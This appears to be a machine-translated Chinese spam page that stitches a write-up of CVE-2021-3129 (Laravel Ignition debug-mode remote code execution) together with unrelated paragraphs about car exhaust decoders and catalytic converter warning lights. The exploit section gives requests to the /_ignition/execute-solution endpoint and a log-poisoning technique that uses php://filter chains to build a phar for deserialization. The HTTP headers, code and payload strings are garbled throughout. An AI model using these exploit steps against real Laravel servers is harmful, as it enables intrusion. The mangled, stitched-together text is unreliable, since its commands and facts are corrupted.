CVE-2021-3129分析

你想知道一些关于CVE-2021-3129分析和汽车尾气解码是怎么回事的吗？那么听小编为详细的解吧！

Tag:[[phpphar]]|[[php反序列化]]

搭建环境

硕士VulEnv/laravel/cve_2021_3129XuCcc/VulEnv

源码分析

根据描述，这本质上是由于Facade/ignition引起的题，直接检查Ignition的提交历史记录[^1]，看看它是否在FacadeIgnitionSolutionsMakeViewVariableOptionalSolution中添加了安全过滤函数isSafePath。

//FacadeIgnitionSolutionsMakeViewVariableOptionalSolution:makeOptional

公共函数makeOptionalarray$parameters=[]

返回$newContents。

发现危险函数file_get_contents并跟踪函数调用堆栈。

FacadeIgnitionSolutionsMakeViewVariableOptionalSolution:makeOptional

前点火解决方案MakeViewVariableOptionalSolution:run

FacadeIgnitionHttpControllersExecuteSolutionController:__invoke

FacadeIgnitionIgnitionServiceProvider:registerHousekeepingRoutes参数$parameters[39;]没有过滤，可以通过执行解决方案路由触发。根据文档[^2]，如果您运行解决方案任务，您将看到它会将您带到源头。

创建概念验证

当您启动环境时，您将看到“IgnitionErrorRecovery”界面。单击“生成应用程序密钥”以捕获数据包。

POST/_ignition/执行解决方案HTTP/11

主机本地主机8000

内容长度82

接受应用程序/json

内容类型应用程序/json

User-Agent:Mozilla/50WindowsNT100、Win64、x64AppleWebKit/53736KHTML（例如GeckoChrome/950463869Safari/53736）

来源

推荐人

Accept-Encoding:gzip，收缩

接受语言zh-CN,zh;q=09

关闭连接

然后通过MakeViewVariableOptionalSolution修改参数solution来指定解决方案。

POST/_ignition/执行解决方案HTTP/11

主机本地主机8000

内容长度163

接受应用程序/json

内容类型应用程序/json

User-Agent:Mozilla/50WindowsNT100、Win64、x64AppleWebKit/53736KHTML（例如GeckoChrome/950463869Safari/53736）

来源

推荐人

Accept-Encoding:gzip，收缩

接受语言zh-CN,zh;q=09

关闭连接

HTTP/11500内部服务器错误

主机本地主机8000

日期2022年3月15日星期二08:00:15GMT

连接closeX-Powered-By:PHP/7321

Cache-Control:无缓存，私有

日期2022年3月15日星期二08:00:15GMT

内容类型应用程序/json

500表示存在漏洞。

写经验

一旦有了上传点，就可以直接上传phar文件进行反序列化，然后快速进行第四步，触发反序列化。

使用你的想法

如果没有可用的上传点，可以操作/storage/logs/laravelog日志文件，使用php://filter中的函数构建phar文件，并进行反序列化。

清除日志文件

创建合法的phar文件

[2022-03-0809:09:26]localERROR:file_get_contentsAA:无法打开stream:文件或目录不存在。

39;$payload[:15]部分有效负载

[[phpphar39;php://输出39;w39;convertbase64-encode39;converticonvutf-8utf-16le39;convertquoted-printable-encode34;POCCCCCCCCCCCC39;php://输出39;w39;convertquoted-printable-decode39;converticonvutf-16leutf-839;Convertbase64-decode34;AACCU=00E=009=00D=00Q=000=00N=00D=00Q=000=00N=00D=00Q=000=00N=00D=00Q=000=00N=00D=00CCAA39;php://输出39；W39；转换引用-PRINTABLE-DECODE39；转换utf-6Leutf-839；转换Base64-DECODE34；UE9DQ0NDQ0NDQ0ND34;u=00E=00009=00d=00Q=000=00n=00d=00Q=000=00N=00D=00Q=000=00N=00D=00Q=000=00N=00D=0034;php://过滤/读取=convertquoted-printable-decode|converticvutf-16leutf-8|convertbase64-decode/resource=/storage/logs/laravellog34;php://filter/read=convertquoted-printable-decode|converticonvutf-16leutf-8|convertbase64-decode/resource=/storage/logs/laravelog39;viewFile39;bladephp39;

返回事实；

参考

Laravel8CVE-2021-3129复发分析-TARITARI

Laravel调试模式RCE复发-inHann的博客|inHann的博客

Laravel调试模式RCE分析复发-ProphetCommunity

如何使用解码器重置排气管？1可以使用解码器对排气管进行复位。2解码器是将输入编码信号转换为输出信号的电子设备。在对排气管进行复位时，可以将复位信号输入到解码器，解码器根据输入信号进行解码，输出相应的控制信号，实现排气管的复位操作。3为保证复位操作的准确性和稳定性，应注意选择合适的解码器型号和接线方法。还需要了解排气管的具体结构和工作原理，避免在复位过程中损坏排气管或影响其正常工作。

如果三元催化器警报打开并被解码可以吗？如果您的汽车三元催化故障灯亮起，您需要先对汽车电脑进行解码，如果解码后仍然亮起，则说明不是电脑题，可能是您汽车中的氧传感器损坏。此时，请前往附近的维修店或4S店请专家维修或更换氧传感器。

如果我的三元催化器故障灯亮起，我该怎么办？

氧传感器是减少废气污染的重要组成部分。它负责检测废气中的氧气浓度并向ECU发送反馈信号，如果混合气的空燃比在化学计量空燃比之外，三通的CO和HC净化能力催化转化器减少。NOx迅速减少。三元催化器是汽车排气系统的外置净化装置，催化剂主要由三种贵金属组成，可以通过氧化和还原催化三种最重要的有害物质，所以应该称为三元催化器。方式催化剂。如何催化转化器。舒适。